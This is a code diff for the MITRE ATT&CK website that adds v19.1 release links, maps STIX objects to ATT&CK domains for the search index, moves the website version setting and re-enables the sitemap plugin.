index 9c91757354c..0c1d1619ba6 100644
--- a/modules/resources/static_pages/updates-april-2026.md
+++ b/modules/resources/static_pages/updates-april-2026.md
@@ -8,7 +8,7 @@ save_as: resources/updates/updates-april-2026/index.html
 
 | Version | Start Date | End Date | Data | Changelogs |
 |:--------|:-----------|:---------|:-----|:-----------|
-| [ATT&CK v19](/versions/v19) | April 28, 2026 | Current version of ATT&CK | [v19.0 on MITRE/CTI](https://github.com/mitre/cti/releases/tag/ATT%26CK-v19.0) | 18.1 - 19.0 [Details](/docs/changelogs/v18.1-v19.0/changelog-detailed.html) ([JSON](/docs/changelogs/v18.1-v19.0/changelog.json)) |
+| [ATT&CK v19](/versions/v19) | April 28, 2026 | Current version of ATT&CK | [v19.0 on MITRE/CTI](https://github.com/mitre/cti/releases/tag/ATT%26CK-v19.0) <br /> [v19.1 on MITRE/CTI](https://github.com/mitre/cti/releases/tag/ATT%26CK-v19.1) | 18.1 - 19.0 [Details](/docs/changelogs/v18.1-v19.0/changelog-detailed.html) ([JSON](/docs/changelogs/v18.1-v19.0/changelog.json)) <br />19.0 - 19.1 [Details](/docs/changelogs/v19.0-v19.1/changelog-detailed.html) ([JSON](/docs/changelogs/v19.0-v19.1/changelog.json)) |
 
 The April 2026 (v19) ATT&CK release updates Techniques, Groups, Campaigns and Software for Enterprise, Mobile, and ICS.
 
diff --git a/modules/search/search.py b/modules/search/search.py
index 95edf3e60fd..92bd2b746de 100644
--- a/modules/search/search.py
+++ b/modules/search/search.py
@@ -9,6 +9,7 @@
 
 import modules
 from modules import site_config, versions
+from modules.util import buildhelpers, relationshipgetters
 
 types = ["software", "groups", "tactics", "techniques"]
 sub_types = ["mobile", "enterprise", "ics"]
@@ -16,6 +17,18 @@
 sub_types_hash = set(sub_types)
 dist_words = 0
 domains = ["enterprise", "mobile", "ics"]
+domain_source_suffix = "-attack"
+object_path_prefixes = {
+    "campaign": "campaigns",
+    "course-of-action": "mitigations",
+    "intrusion-set": "groups",
+    "malware": "software",
+    "tool": "software",
+    "x-mitre-analytic": "analytics",
+    "x-mitre-asset": "assets",
+    "x-mitre-data-component": "datacomponents",
+    "x-mitre-detection-strategy": "detectionstrategies",
+}
 
 
 def generate_index():
@@ -23,6 +36,7 @@ def generate_index():
     logger.info("Creating searchable index for the site")
     index_data = defaultdict(list)
     global_id_counter = 0
+    domain_lookup = build_domain_lookup()
 
     for root, __, files in os.walk(site_config.web_directory):
         skip = False
@@ -38,6 +52,9 @@ def generate_index():
 
             path = absolute_path[6:]
 
+            if should_skip_search_path(path):
+                continue
+
             file_type = get_page_type(path)
 
             if not skipindex:
@@ -48,7 +65,7 @@ def generate_index():
                         "path": path,
                         "content": cleancontent,
                         "pageType": file_type,
-                        "domains": get_domains(title),
+                        "domains": get_domains(title, path, domain_lookup),
                     }
                 )
                 global_id_counter += 1
@@ -109,18 +126,98 @@ def get_page_type(path):
         return "detectionstrategies"
     if path.startswith("/analytics/"):
         return "analytics"
-    return "resources"
+    if path.startswith("/resources/"):
+        return "resources"
+    return "misc"
+
+
+def should_skip_search_path(path):
+    """Return whether a generated path is a helper page that should not be searchable."""
+    return bool(re.search(r"/sidebar-[^/]+/index\.html$", path))
+
 
+def get_domains(title, path=None, domain_lookup=None):
+    """Get ATT&CK domains for a search result, preferring source metadata before title inference."""
+    if path and domain_lookup and path in domain_lookup:
+        return sorted(domain_lookup[path], key=domains.index)
 
-def get_domains(title):
-    """Get explicit ATT&CK domains encoded in the page title."""
-    page_domains = []
+    page_domains = set()
 
     for domain in domains:
         if re.search(rf"(^| - ){domain}( - |$)", title, re.IGNORECASE):
-            page_domains.append(domain)
+            page_domains.add(domain)
+
+    return sorted(page_domains, key=domains.index)
+
+
+def build_domain_lookup():
+    """Build generated-page path to domain mappings from STIX source bundle membership."""
+    domain_lookup = defaultdict(set)
+
+    try:
+        memory_stores = relationshipgetters.get_ms()
+    except Exception as exc:
+        logger.debug(f"Unable to build source-domain lookup for search index: {exc}")
+        return domain_lookup
+
+    for domain_config in site_config.domains:
+        domain = normalize_domain(domain_config["name"])
+        if domain_config["deprecated"] or domain not in domains:
+            continue
+
+        memory_store = memory_stores.get(domain_config["name"])
+        if not memory_store:
+            continue
+
+        for stix_object in memory_store.query():
+            object_path = get_object_search_path(stix_object)
+            if object_path:
+                domain_lookup[object_path].add(domain)
+
+            for explicit_domain in normalize_domains(stix_object.get("x_mitre_domains", [])):
+                if object_path:
+                    domain_lookup[object_path].add(explicit_domain)
+
+    return domain_lookup
+
+
+def get_object_search_path(stix_object):
+    """Return generated search path for a STIX object when it maps to one searchable detail page."""
+    attack_id = buildhelpers.get_attack_id(stix_object)
+    if not attack_id:
+        return None
+
+    if stix_object.get("type") == "attack-pattern":
+        if "." in attack_id:
+            parent_id, sub_id = attack_id.split(".", 1)
+            return f"/techniques/{parent_id}/{sub_id}/index.html"
+        return f"/techniques/{attack_id}/index.html"
+
+    path_prefix = object_path_prefixes.get(stix_object.get("type"))
+    if not path_prefix:
+        return None
+
+    return f"/{path_prefix}/{attack_id}/index.html"
+
+
+def normalize_domains(source_domains):
+    """Normalize STIX domain names to search filter keys."""
+    if isinstance(source_domains, str):
+        source_domains = [source_domains]
+
+    normalized_domains = []
+
+    for source_domain in source_domains:
+        domain = normalize_domain(source_domain)
+        if domain in domains:
+            normalized_domains.append(domain)
+
+    return normalized_domains
+
 
-    return page_domains
+def normalize_domain(source_domain):
+    """Normalize domain source names such as enterprise-attack to enterprise."""
+    return str(source_domain).removesuffix(domain_source_suffix).lower()
 
 
 skiplines = ["breadcrumb-item", "nav-link"]
diff --git a/modules/site_config.py b/modules/site_config.py
index b684c286648..fa98d6b268b 100644
--- a/modules/site_config.py
+++ b/modules/site_config.py
@@ -9,6 +9,7 @@
 load_dotenv()
 
 attack_version = ""
+website_version = "4.4.3"
 
 # Read versions file for ATT&CK version
 with open("data/versions.json", "r", encoding="utf8") as f:
@@ -170,7 +171,12 @@ def set_subdirectory(subdirectory_str):
 #     domain: "enterprise", "mobile", "ics"
 #     path: the path to the object, e.g "software/S1001" or "groups/G2021"
 layer_md = Template(
-    "Title: ${domain} Techniques\nTemplate: general/json\nsave_as: ${path}/${attack_id}-${domain}-layer.json\njson: "
+    "Title: ${attack_id} ${domain} Techniques Layer\n"
+    "Template: general/json\n"
+    "url: ${path}/${attack_id}-${domain}-layer.json\n"
+    "private: True\n"
+    "save_as: ${path}/${attack_id}-${domain}-layer.json\n"
+    "json: "
 )
 layer_version = "4.5"
 navigator_version = "5.3.2"
diff --git a/modules/website_build/website_build_config.py b/modules/website_build/website_build_config.py
index b9c76d4a00b..ebfce77a5ca 100644
--- a/modules/website_build/website_build_config.py
+++ b/modules/website_build/website_build_config.py
@@ -1,8 +1,6 @@
 import os
 from string import Template
 
-import toml
-
 import modules
 from modules import site_config
 
@@ -12,9 +10,6 @@
 # Template directory
 template_dir = os.path.join("attack-theme", "templates", "general/")
 
-pyproject_toml = toml.load("pyproject.toml")
-website_version = pyproject_toml["tool"]["towncrier"]["version"]
-
 # Base page data for website header and footer
 # additional keys that are used/set in website_build.py:
 #    BANNER_ENABLED
@@ -23,7 +18,7 @@
 #    RESOURCES
 base_page_data = {
     "CONTENT_VERSION": site_config.attack_version,
-    "WEBSITE_VERSION": website_version,
+    "WEBSITE_VERSION": site_config.website_version,
     "CHANGELOG_LOCATION": "/resources/changelog.html",
     "LOGO_HEADER": "/theme/images/mitre_attack_logo.png",
     "LOGO_FOOTER": "/theme/images/mitrelogowhiteontrans.gif",
diff --git a/pelicanconf.py b/pelicanconf.py
index 8c43870989e..98c9ae4ed01 100644
--- a/pelicanconf.py
+++ b/pelicanconf.py
@@ -22,8 +22,7 @@
 DEFAULT_LANG = os.environ.get("PELICAN_DEFAULT_LANG", "en")
 
 THEME = "attack-theme"
-# TODO: re-enable sitemap when it doesn't generate a 100+ MB file
-# PLUGINS = ["sitemap"]
+PLUGINS = ["sitemap"]
 SITEMAP = {
     "format": "xml",
     "priorities": {
diff --git a/pyproject.toml b/pyproject.toml
index c1be39ce3b0..638468f5c0c 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -4,16 +4,6 @@ line-length = 120
 [tool.isort]
 profile = "black"
 
-[tool.towncrier]
-    name = "ATT&CK website"
-    version = "4.4.2"
-    filename = "CHANGELOG.md"
-    issue_format = "[#{issue}](https://github.com/mitre-attack/attack-website/issues/{issue})"
-    template = ".towncrier.template.md"
-    start_string = "<!-- TOWNCRIER -->\n"
-    title_format = "# v{version} ({project_date})"
-    underlines = ["-", "", ""]
-
 [tool.ruff]
 line-length = 120
 ignore = [
diff --git a/requirements.txt b/requirements.txt
index 8758d2ac56a..7ae062b1fdf 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -4,16 +4,13 @@ bleach==6.3.0
 colorama==0.4.6
 future==1.0.0
 loguru==0.7.3
-mitreattack-python==5.5.0
+mitreattack-python==6.1.0
 pelican==4.12.0
-# TODO: re-enable sitemap when it doesn't generate a 100+ MB file
-# pelican-sitemap==1.2.2
+pelican-sitemap==1.2.2
 python-dotenv==1.2.2
 requests==2.33.1
 stix2==3.0.2
 stix2-validator==3.2.0
-toml==0.10.2
-towncrier==25.8.0
 
 # dev dependencies
 ruff>=0.15.11